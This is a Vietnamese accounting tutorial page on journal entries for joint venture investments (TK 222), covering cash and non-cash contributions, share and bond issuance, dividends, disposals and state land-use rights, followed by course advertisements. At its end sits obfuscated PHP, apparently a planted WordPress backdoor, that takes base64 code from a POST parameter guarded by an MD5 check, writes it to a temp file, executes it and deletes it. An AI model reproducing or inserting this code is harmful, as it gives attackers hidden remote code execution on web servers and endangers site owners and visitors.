1

CÁCH HẠCH TOÁN GÓP VỐN LIÊN DOANH

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

KẾ TOÁN HÀ NỘI tham khảo và chia sẻ lại cho anh chị em nhà kế chúng mình về: CÁCH HẠCH TOÁN GÓP VỐN LIÊN DOANH

1. Khi góp vốn liên doanh bằng tiền vào Công ty liên doanh, liên kết, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Có TK 111, 112

2. Hạch toán các chi phí liên quan trực tiếp tới việc đầu tư vào Công ty liên doanh, liên kết
Khi phát sinh các chi phí liên quan trực tiếp tới việc đầu tư vào Công ty liên doanh, liên kết như: Chi phí giao dịch, môi giới, tư vấn, kiểm toán, lệ phí, thuế và phí ngân hàng,…, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Nợ TK 133: Thuế GTGT được khấu trừ (Nếu được khấu trừ)
Có TK 111, 112

3. Hạch toán khi bên tham gia liên doanh góp vốn vào Công ty liên doanh, liên kết bằng tài sản phi tiền tệ
Khi đầu tư vào Công ty liên doanh, liên kết bằng hàng tồn kho hoặc TSCĐ => Phải ghi nhận phần chênh lệch giữa giá trị ghi sổ (Đối với vật tư, hàng hóa) hoặc giá trị còn lại (Đối với TSCĐ) và giá trị đánh giá lại của tài sản đem đi góp vốn do các bên đánh giá vào thu nhập khác hoặc chi phí khác; Công ty liên doanh, liên kết khi nhận tài sản của nhà đầu tư phải ghi tăng vốn đầu tư của chủ sở hữu và tài sản nhận được theo giá thỏa thuận giữa các bên.
– Trường hợp giá trị ghi sổ hoặc giá trị còn lại của tài sản đem đi góp vốn nhỏ hơn giá trị do các bên đánh giá lại => Phản ánh phần chênh lệch đánh giá tăng tài sản vào thu nhập khác, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Nợ TK 214: Hao mòn TSCĐ (TK cấp 2 phù hợp)
Có TK 211, 213, 217 (Góp vốn bằng TSCĐ hoặc BĐS đầu tư)
Có TK 152, 153, 155, 156 (Nếu góp vốn bằng hàng tồn kho)
Có TK 711: Thu nhập khác (Phần chênh lệch đánh giá tăng)
– Trường hợp giá trị ghi sổ hoặc giá trị còn lại của tài sản đem đi góp vốn lớn hơn giá trị do các bên đánh giá lại => Phản ánh phần chênh lệch đánh giá giảm tài sản vào chi phí khác, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Nợ TK 214: Hao mòn TSCĐ (TK cấp 2 phù hợp)
Nợ TK 811: Chi phí khác (Phần chênh lệch đánh giá giảm)
Có TK 211, 213, 217 (Góp vốn bằng TSCĐ hoặc BĐS đầu tư)
Có TK 152, 153, 155, 156 (Nếu góp vốn bằng hàng tồn kho)

4. Hạch toán khi Nhà đầu tư mua lại phần vốn góp tại Công ty liên doanh, liên kết
Tại ngày mua, Nhà đầu tư xác định và phản ánh giá phí khoản đầu tư vào Công ty liên doanh, liên kết bao gồm: Giá trị hợp lý tại ngày diễn ra trao đổi của các tài sản đem trao đổi, các khoản nợ phải trả đã phát sinh hoặc đã thừa nhận và các công cụ vốn do Bên mua phát hành để đổi lấy quyền đồng kiểm soát tại Công ty liên doanh, liên kết cộng (+) Các chi phí liên quan trực tiếp đến việc mua lại phần vốn góp tại Công ty liên doanh, liên kết.

– Nếu việc đầu tư vào Công ty liên doanh, liên kết được thanh toán bằng tiền, hoặc các khoản tương đương tiền, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Có TK 111, 112, 121,…
– Nếu việc đầu tư vào Công ty liên doanh, liên kết được thực hiện bằng cách phát hành cổ phiếu:
+ Nếu giá phát hành (Theo giá trị hợp lý) của cổ phiếu tại ngày diễn ra trao đổi lớn hơn mệnh giá cổ phiếu, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết (Theo giá trị hợp lý)
Có TK 4111: Vốn góp của chủ sở hữu (Theo mệnh giá)
Có TK 4112: Thặng dư vốn cổ phần (Số chênh lệch giữa giá trị hợp lý lớn hơn mệnh giá cổ phiếu)
+ Nếu giá phát hành (Theo giá trị hợp lý) của cổ phiếu tại ngày diễn ra trao đổi nhỏ hơn mệnh giá cổ phiếu, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết (Theo giá trị hợp lý)
Nợ TK 4112: Thặng dư vốn cổ phần (Số chênh lệch giữa giá trị hợp lý nhỏ hơn mệnh giá cổ phiếu)
Có TK 4111: Vốn góp của chủ sở hữu (Theo mệnh giá)
+ Chi phí phát hành cổ phiếu thực tế phát sinh, ghi:
Nợ TK 4112: Thặng dư vốn cổ phần
Có TK 111, 112,…
– Nếu việc đầu tư vào Công ty liên doanh, liên kết được thanh toán bằng tài sản phi tiền tệ:
+ Trường hợp trao đổi bằng TSCĐ, khi đưa TSCĐ đem trao đổi => Ghi giảm TSCĐ:
Nợ TK 811: Chi phí khác (Giá trị còn lại của TSCĐ đưa đi trao đổi)
Nợ TK 214: Hao mòn TSCĐ (TK 2141) (Giá trị hao mòn)
Có TK 211: TSCĐ hữu hình (Nguyên giá)
Đồng thời ghi tăng thu nhập khác và tăng khoản đầu tư vào Công ty liên doanh, liên kết do trao đổi TSCĐ, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết (Tổng giá thanh toán)
Có TK 711: Thu nhập khác (Giá trị hợp lý của TSCĐ đưa đi trao đổi)
Có TK 3331: Thuế GTGT phải nộp (TK 33311) (Nếu có)
+ Trường hợp trao đổi bằng sản phẩm, hàng hóa; Khi xuất kho sản phẩm, hàng hóa đưa đi trao đổi, ghi:
Nợ TK 632: Giá vốn hàng bán
Có TK 155, 156,…
Đồng thời phản ánh doanh thu bán hàng và ghi tăng khoản đầu tư vào Công ty liên doanh, liên kết, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Có TK 511: Doanh thu bán hàng và cung cấp dịch vụ
Có TK 333: Thuế và các khoản phải nộp Nhà nước (TK 33311)
– Nếu việc đầu tư vào Công ty liên doanh, liên kết được Bên mua thanh toán bằng việc phát hành trái phiếu:
+ Trường hợp thanh toán bằng trái phiếu theo mệnh giá, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết (Theo giá trị hợp lý)
Có TK 34311: Mệnh giá trái phiếu.
+ Trường hợp thanh toán bằng trái phiếu có chiết khấu, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết (Theo giá trị hợp lý)
Nợ TK 34312: Chiết khấu trái phiếu (Phần chiết khấu)
Có TK 34311: Mệnh giá trái phiếu
+ Trường hợp thanh toán bằng trái phiếu có phụ trội, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết (Theo giá trị hợp lý)
Có TK 34311: Mệnh giá trái phiếu
Có TK 34313: Phụ trội trái phiếu (Phần phụ trội)
+ Các chi phí liên quan trực tiếp đến việc đầu tư vào Công ty liên doanh, liên kết như chi phí tư vấn pháp lý, thẩm định giá,… ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Có TK 111, 112, 331,…

5. Các khoản chi phí liên quan đến hoạt động góp vốn liên doanh, liên kết phát sinh trong kỳ như lãi tiền vay để góp vốn, các chi phí khác, ghi:
Nợ TK 635: Chi phí tài chính
Nợ TK 133: Thuế GTGT được khấu trừ (Nếu được khấu trừ)
Có TK 111, 112, 152,…

6. Kế toán cổ tức, lợi nhuận được chia
– Khi nhận được thông báo về cổ tức, lợi nhuận được chia bằng tiền từ Ccông ty liên doanh, liên kết cho giai đoạn sau ngày đầu tư, ghi:
Nợ TK 138: Phải thu khác (TK 1388)
Có TK 515: Doanh thu hoạt động tài chính
– Khi nhận được cổ tức, lợi nhuận của giai đoạn trước khi đầu tư hoặc cổ tức, lợi nhuận được chia (Bằng tiền) đã sử dụng để đánh giá lại giá trị khoản đầu tư vào Công ty liên doanh, liên kết khi xác định giá trị Doanh nghiệp để cổ phần hóa, ghi:
Nợ TK 111, 112, 138
Có TK 222: Đầu tư vào Công ty liên doanh, liên kết

7. Kế toán thanh lý, nhượng bán khoản đầu tư vào Công ty liên doanh, liên kết, ghi:
Nợ TK 111, 112, 131, 152, 153, 156, 211, 213,… (Giá trị thanh lý, nhượng bán thu được bằng tiền hoặc tài sản)
Nợ TK 228: Đầu tư khác (Giá trị đầu tư vào Công ty liên doanh, liên kết còn lại không còn thỏa mãn điều kiện đầu tư vào Ccông ty liên doanh, liên kết => Chuyển thành đầu tư khác)
Nợ TK 635: Chi phí tài chính (Nếu lỗ)
Có TK 222: Đầu tư vào Công ty liên doanh, liên kết
Có TK 515: Doanh thu hoạt động tài chính (Nếu lãi)

8. Chi phí thanh lý, nhượng bán khoản đầu tư vào Công ty liên doanh, liên kết, ghi:
Nợ TK 635: Chi phí tài chính
Nợ TK 133: Thuế GTGT được khấu trừ (Nếu được khấu trừ)
Có TK 111, 112, 331,…

9. Trường hợp đầu tư thêm để Công ty liên doanh, liên kết trở thành Công ty con và nắm giữ quyền kiểm soát, ghi:
Nợ TK 221: Đầu tư vào Công ty con (Bao gồm giá trị khoản đầu tư thêm và giá trị khoản đầu tư vào Công ty liên doanh, liên kết chuyển sang)
Có TK 111, 112, 152, 153,… (Giá trị các khoản đầu tư thêm)
Có TK 222: Đầu tư vào Công ty liên doanh, liên kết (Ghi giảm khoản đầu tư vào Công ty liên doanh, liên kết)

10. Kế toán khoản vốn góp liên doanh bằng quyền sử dụng đất do Nhà nước giao
– Khi Doanh nghiệp Việt Nam được Nhà nước giao đất để góp vốn liên doanh với các Công ty nước ngoài bằng giá trị quyền sử dụng đất, mặt nước, mặt biển => Sau khi có quyết định của Nhà nước giao đất và làm xong thủ tục giao cho liên doanh, ghi:
Nợ TK 222: Đầu tư vào Công ty liên doanh, liên kết
Có TK 411: Vốn đầu tư của chủ sở hữu (Chi tiết vốn Nhà nước)
– Trường hợp bên Việt Nam được Nhà nước giao đất để tham gia liên doanh, khi chuyển nhượng vốn góp thì thực hiện như sau:
+ Khi chuyển nhượng vốn góp vào Công ty liên doanh cho bên nước ngoài và trả lại quyền sử dụng đất cho Nhà nước, ghi:
Nợ TK 411: Vốn đầu tư của chủ sở hữu
Có TK 222: Đầu tư vào Công ty liên doanh.
+ Nếu bên đối tác thanh toán cho bên Việt Nam tài sản ngoài quyền sử dụng đất (Trong trường hợp này Công ty liên doanh chuyển sang thuê đất), ghi:
Nợ TK 111, 112,…
Có TK 515: Doanh thu hoạt động tài chính.

———–0———-

 

– Chuyên cung cấp khóa HỌC KẾ TOÁN THỰC HÀNH THỰC CHIẾN ĐỂ RA NGHỀ ĐI LÀM NGAY
– NHẬN DẠY KẾ TOÁN CHO NGƯỜI CHƯA BIẾT GÌ HOẶC MẤT GỐC
– Dạy nâng cao để thành thạo kế toán tổng hợp. Dạy kèm riêng 1-1 kế toán theo mọi nhu cầu
Dịch vụ kế toán cho các công ty giá rẻ uy tín
– Dạy Trực Tiếp tại các chi nhánh trực thuộc toàn Quốc hoặc Onl Trực Tuyến, Inbox Zalo mình nhé – 0973.761.751 (Hotline)

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}